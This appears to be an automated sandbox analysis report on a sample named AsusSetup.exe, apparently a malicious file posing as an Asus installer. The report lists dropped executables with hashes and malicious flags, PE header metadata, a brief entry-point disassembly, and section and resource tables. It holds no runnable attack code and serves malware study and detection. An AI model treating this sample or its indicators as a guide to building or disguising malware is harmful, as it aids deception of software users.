                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AABD6B0869E1725DCF733FCA841832100E4239C03D1D2FF69C99D4D95EE043C3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D95815634EFD48A21AF262EA3B115AEE9DEBD617D1E4C4C79242BF2205DCA18977B6124FD8FFEC571B46AD23285386E5C57B9AFE05AEDA9ED9CEEC9F0AB5DB4B
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.983311824699206
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:9QTqk9jxlxKQF+2JTcrk+rfJcNqT/HG9qyRLCdx:uTtjxfKhrhTSSWqAOdx
                                                                                                                                                                                                                                                                                                                                                                                        MD5:64475032E4C94472AA7937EDC158EF8B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3A6419AFF218573E840C07BEED86AAB22A15EB7A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A161F087A1357E09548D99E738B48E8983683FA3A5A76151A355323928529F1F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:832E0B2AB4D9F58E16492BDC5EB76DAF6401733A45E6DEF735ECBCAD8A9CC1BA6BE6CA4423F61A1E863559E3000A7F9AA323C2373EB1EAD9F2284EDBE2D73079
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.246037405156198
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:0QW4qoNUgslKNX0Ip0MgHCpoMBOuJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0QW9BKNX0IPgiKMBOuJLNiXicJFFRGNf
                                                                                                                                                                                                                                                                                                                                                                                        MD5:8DF9B4C3E64A3509DEE72C0E8333DDA6
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:586C71B77170FB45C8C46B0DE601920152FDD9E2
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1B5C7E24256B5A901B0CBD3B5CED69076E9183FC08BCF2A7DE036A865DE37171
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5FE9284420E77DA3D20BB171AAF6CE3A56C9F579DB64C6375ED066C38746252DB0DD99DA50A0CD85ED4FF141492FB0831CD02E0CA77FDBB6C34FAA274D9989FA
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1379840
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686015796117744
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:52G7AbHjka/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:52G7AbHjTLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:1A548947D8E54C77D587A0F462CFFE45
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5D889BF86B8E8548A2FA561A484C0DF3E85363CE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9BB345DA07B709A7F521395A292AD6D8BE982308F9CB90E7C51EE092B74873B9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:81EB13A9EA15D0A5058DF8395E7A1FAE31FECF21AA9EDC1834621784504F54B875F8E1966E4E336F202AE0CC89E2C564456DBBF9FA6208737C778A7568B52C79
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.2830082491947294
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:ykdpSI+K3S/GWei+qNv2uG3i/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:y6SIGGWei2uG3iLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:0EC424B89B232FD9D839942FBC5274E2
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:49A7881FFF035102B735C2409F16137750ABAE6F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EDB6309AF48980A05CBE829878E8CD601AF52379E5D05B5DDA87C2A973E2D870
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D07E931E5B5C8ACB507D67C8292ED60CEEF163CA0C801EA9D7528F8B9C57FB1DA8215BDC30B539FAFFA5256217008E01F14E947D960309988AD9720FA2CFA983
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1381376
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.68639599675767
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3rL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3rLLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:0E2255EDBB351BDA0949D09F88FA226E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FB928437514C254AA1061150A7A1ABD333EFF026
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F984807B9C42035E6403AED5F2DFE7723A7A13DC8FD43F4A666AFA77926D3CE7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1B1717DDF8AF70A78F80A362845670D37B7EDA9C5B0E3F3B4E3C2ED819AD5E742D997EB9DAA162C97829D860CE1372A3F497D5240A721077F95DE842C1C0F4DF
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.98598064426651
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:L23U4CxugCzCbeLWpjqI288yqqs0BQvSe1+zHv7XvcxJeByuhjEiJgFFoiIAI3cR:qwfbIWII18WVOSeg7zXie3EsgroTXu11
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3AE78160FC8BEE21000053E946D037C2
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6BE454ED7F1BF8D80B46E84A55CEC8B8D3408F18
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:949F067105C2F2AB580E9C6CC98BCD18FAC428420D9AEA130993F9B5C719322C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:01FAFB3710C47F4C8A239DC9EA4FE51E34328643F2922522627CDE943970D967E62E4480FFCE9325DB00C3FD2D6F26ED5F4639540C4584CCA10A4FF560E733B2
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.953364197222141
                                                                                                                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                                                                                                                        • Win64 Executable GUI (202006/5) 60.38%
                                                                                                                                                                                                                                                                                                                                                                                        • Windows ActiveX control (116523/4) 34.83%
                                                                                                                                                                                                                                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 3.59%
                                                                                                                                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.60%
                                                                                                                                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.60%
                                                                                                                                                                                                                                                                                                                                                                                        File name:AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File size:5'251'072 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5:13bf2819401d2f983fff90c1960831b8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0b8058088b47edbcf963ac2ac7d5b23fa35e0e90
                                                                                                                                                                                                                                                                                                                                                                                        SHA256:7db9ca7dbe9a5724ef452585280e73a1a73563cc6a2559f2588d613454f70261
                                                                                                                                                                                                                                                                                                                                                                                        SHA512:af83b681f62582e9cbf983f6e5e1ba32c3a6ccd7896c644d77a5d5d76b2ca24af85deb6ea6621a0b29e15ab7637ba9f9606b09fb56387461604c38d8ca85502f
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:pmuSFdw5ujhEMdcbJFLOAkGkzdnEVomFHKnPV7wRGpj3:ChKMdcNFLOyomFHKnPpF9
                                                                                                                                                                                                                                                                                                                                                                                        TLSH:FE36BF4AAFEC40E8D4A6D035C96B895BD7B6BC601631878F1064775F6F333918E2E326
                                                                                                                                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................c.............................................................................m.............Rich...
                                                                                                                                                                                                                                                                                                                                                                                        Icon Hash:57171d4de7912e31
                                                                                                                                                                                                                                                                                                                                                                                        Entrypoint:0x1401cacb4
                                                                                                                                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                                                                                        Time Stamp:0x61615653 [Sat Oct 9 08:44:03 2021 UTC]
                                                                                                                                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                        Import Hash:624b40321b3d0fd2a008a7271554dd30
                                                                                                                                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                                                                                                                                        mov edx, 00000FA0h
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        lea ecx, dword ptr [000FC48Bh]
                                                                                                                                                                                                                                                                                                                                                                                        call dword ptr [0003AA55h]
                                                                                                                                                                                                                                                                                                                                                                                        nop
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        lea ecx, dword ptr [000976ADh]
                                                                                                                                                                                                                                                                                                                                                                                        call dword ptr [0003AB1Fh]
                                                                                                                                                                                                                                                                                                                                                                                        nop
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        mov ebx, eax
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                                                                                                                                                                        jne 00007F25B4D6794Ch
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        lea ecx, dword ptr [000409FFh]
                                                                                                                                                                                                                                                                                                                                                                                        call dword ptr [00000009h]
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2b4650 | 0x1a4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2e1000 | 0x18ced0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x2c9000 | 0x17ef8 | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x276a40 | 0x70 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x276bb0 | 0x28 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x276ab0 | 0x100 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x205000 | 0x1598 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x203a84 | 0x203c00 | 55b33a0057eb1249062d404be6f3c191 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x205000 | 0xb3d38 | 0xb3e00 | ff7e3f5077be3fcdc08c5cefe3b61d4c | False | 0.2822516721681723 | data | 4.503762467408248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x2b9000 | 0xff28 | 0x8200 | 2f1ce6f3cad070fb35415b8819bef07c | False | 0.19435096153846154 | DIY-Thermocam raw data (Lepton 2.x), scale -10205-9792, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 214.254868 | 4.149010331740686 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0x2c9000 | 0x17ef8 | 0x18000 | 8bf150e7a62f97a619c3cdc82be98ce0 | False | 0.5033976236979166 | data | 6.127219429376976 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x2e1000 | 0x18ced0 | 0x18d000 | 9c8c5f222f38bacdf70cf40cfe0a5854 | False | 0.5891008737405542 | data | 7.435885059265607 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x46e000 | 0x9e000 | 0x9d000 | 0a7ec46257812d1e3d4161a390673ed1 | False | 0.8984857061106688 | data | 7.909171977386322 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| DLL | 0x2f5928 | 0x1b600 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | English | United States | 0.4680543664383562 |
| DLL | 0x310f28 | 0x1de00 | PE32+ executable (DLL) (GUI) x86-64, for MS Windows | English | United States | 0.46928118462343094 |
| PNG | 0x338d08 | 0x77 | PNG image data, 4 x 4, 8-bit/color RGB, non-interlaced | English | United States | 0.9915966386554622 |
| PNG | 0x335648 | 0x2f5 | PNG image data, 70 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 1.0145310435931307 |
| PNG | 0x335bc8 | 0x301 | PNG image data, 70 x 31, 8-bit/color RGBA, non-interlaced | English | United States | 1.0143042912873863 |
| PNG | 0x335940 | 0x287 | PNG image data, 70 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 1.017001545595054 |
| PNG | 0x3385b8 | 0x36e | PNG image data, 22 x 40, 8-bit/color RGB, non-interlaced | English | United States | 1.0125284738041003 |
| PNG | 0x3374d0 | 0x15d | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.0315186246418337 |
| PNG | 0x337630 | 0x13e | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.0345911949685536 |
| PNG | 0x337770 | 0x115 | PNG image data, 30 x 24, 8-bit/color RGB, non-interlaced | English | United States | 1.03971119133574 |
| PNG | 0x337888 | 0x12a | PNG image data, 20 x 40, 8-bit/color RGBA, non-interlaced | English | United States | 1.0302013422818792 |
| PNG | 0x3372c0 | 0x20c | PNG image data, 10 x 28, 8-bit/color RGB, non-interlaced | English | United States | 1.0209923664122138 |
| PNG | 0x338c08 | 0xfd | PNG image data, 10 x 28, 8-bit/color RGB, non-interlaced | English | United States | 1.0276679841897234 |
| PNG | 0x338928 | 0xa6 | PNG image data, 7 x 7, 8-bit/color RGB, non-interlaced | English | United States | 1.0120481927710843 |
| PNG | 0x3389d0 | 0x7c | PNG image data, 3 x 11, 8-bit/color RGBA, non-interlaced | English | United States | 0.9919354838709677 |
| PNG | 0x338a50 | 0x96 | PNG image data, 9 x 8, 8-bit/color RGB, non-interlaced | English | United States | 1.0133333333333334 |
| PNG | 0x338ae8 | 0x91 | PNG image data, 9 x 8, 8-bit/color RGB, non-interlaced | English | United States | 1.006896551724138 |
| PNG | 0x338b80 | 0x84 | PNG image data, 15 x 3, 8-bit/color RGB, non-interlaced | English | United States | 0.9848484848484849 |
| PNG | 0x34c7d0 | 0xa3 | PNG image data, 7 x 7, 8-bit/color RGB, non-interlaced | English | United States | 1.0122699386503067 |
| PNG | 0x348218 | 0x771 | PNG image data, 13 x 156, 8-bit/color RGB, non-interlaced | English | United States | 1.005774278215223 |
| PNG | 0x342bb8 | 0x697 | PNG image data, 52 x 268, 8-bit/color RGBA, non-interlaced | English | United States | 1.006520450503853 |
| PNG | 0x343250 | 0x342 | PNG image data, 30 x 16, 8-bit/color RGBA, non-interlaced | English | United States | 1.013189448441247 |
| PNG | 0x34c370 | 0x45f | PNG image data, 24 x 72, 8-bit/color RGB, non-interlaced | English | United States | 1.0098302055406614 |
| PNG | 0x348b60 | 0x1a3 | PNG image data, 20 x 12, 8-bit/color RGBA, non-interlaced | English | United States | 1.026252983293556 |
| PNG | 0x345720 | 0xac8 | PNG image data, 24 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0039855072463768 |
| PNG | 0x3461e8 | 0x37c | PNG image data, 8 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.0123318385650224 |
| PNG | 0x347338 | 0xa50 | PNG image data, 24 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0041666666666667 |
| PNG | 0x347d88 | 0x48e | PNG image data, 9 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.009433962264151 |
| PNG | 0x346568 | 0xa50 | PNG image data, 24 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0041666666666667 |
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x346fb80x380PNG image data, 8 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33da700xab0PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0040204678362572
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33efb00xb1fPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038637161924833
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33e5200xa8ePNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0040710584752035
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33fad00xb30PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003840782122905
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3416f00x3a6PNG image data, 48 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011777301927195
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x341a980x111bPNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025119890385932
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x343e600x3d1PNG image data, 23 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112589559877174
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3442380x21bPNG image data, 11 x 88, 8-bit/color RGB, non-interlacedEnglishUnited States1.0204081632653061
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3444580xb12PNG image data, 50 x 273, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003881439661256
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x344f700x7acPNG image data, 50 x 162, 8-bit/color RGBA, non-interlacedEnglishUnited States1.005600814663951
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3409a80xd43PNG image data, 50 x 264, 8-bit/color RGB, non-interlacedEnglishUnited States1.003240058910162
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3406000x3a4PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011802575107296
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34c9300x320PNG image data, 14 x 246, 8-bit/color RGBA, non-interlacedEnglishUnited States1.01375
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34cc500x31fPNG image data, 14 x 246, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0137672090112642
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3492500x2bdPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0156918687589158
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x348fd80x273PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0175438596491229
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x348d080x2c9PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0154277699859748
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3489f80x163PNG image data, 70 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112676056338028
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3495100x152PNG image data, 41 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.032544378698225
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3435980x38aPNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0121412803532008
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3439280x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33b2f80x19cPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8810679611650486
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33b4980x2296PNG image data, 72 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001242376327084
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3599100x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35c9500x1c4PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8252212389380531
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35c4280x522PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008371385083714
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x359fb00x2475PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000750026786671
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3566c80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3597480x1c3PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8314855875831486
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3592400x505PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0085603112840467
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x356d680x24d3PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004243131430997
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35cb180x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35fbe00x1c7PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.832967032967033
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35f6a80x536PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082458770614693
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35d1b80x24f0PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011632825719121
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3504880x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3533e00x1c5PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8388520971302428
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x352f000x4d9PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008863819500403
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x350b280x23d3PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34cf700x189PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0279898218829517
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34d1000x1bcPNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7027027027027027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34d3880x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3502c00x1c4PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.827433628318584
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34fdd00x4efPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087094220110848
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34da280x23a2PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0007673755755317
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34d2c00xc5PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0253807106598984
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35fda80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x362e400x1baPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8212669683257918
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3629580x4e4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087859424920127
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3604480x250fPNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0005270369979973
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3535a80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3565000x1c2PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8288888888888889
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3560100x4e9PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087509944311854
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x353c480x23c6PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000436776588775
